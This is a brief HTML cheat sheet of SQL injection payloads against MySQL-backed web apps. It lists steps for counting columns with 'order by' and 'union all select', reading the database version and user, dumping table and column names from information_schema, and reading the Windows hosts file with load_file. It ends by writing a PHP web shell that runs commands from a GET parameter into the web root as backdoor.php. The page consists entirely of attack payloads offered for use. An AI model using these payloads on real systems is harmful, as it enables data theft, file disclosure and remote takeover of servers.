<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>sql injection</title>
</head><body>id=1 order by 1 &nbsp;#for column enum<br/>
<br/>
id=1 union all select 1,2,3 &nbsp;#total number pf columns<br/>
<br/>
@@version<br/>
user()<br/>
table_name from information_schema.tables<br/>
column_name from information_schema.columns where table_name=" "<br/>
<br/>
&nbsp;load_file('C:/Windows/System32 /drivers/etc/hosts')<br/>
<br/>
&nbsp;"&lt;?php echo shell_exec($_GET['cmd']);?&gt;" into OUTFILE 'c:/xampp/htdocs/backdoor.php'</body></html>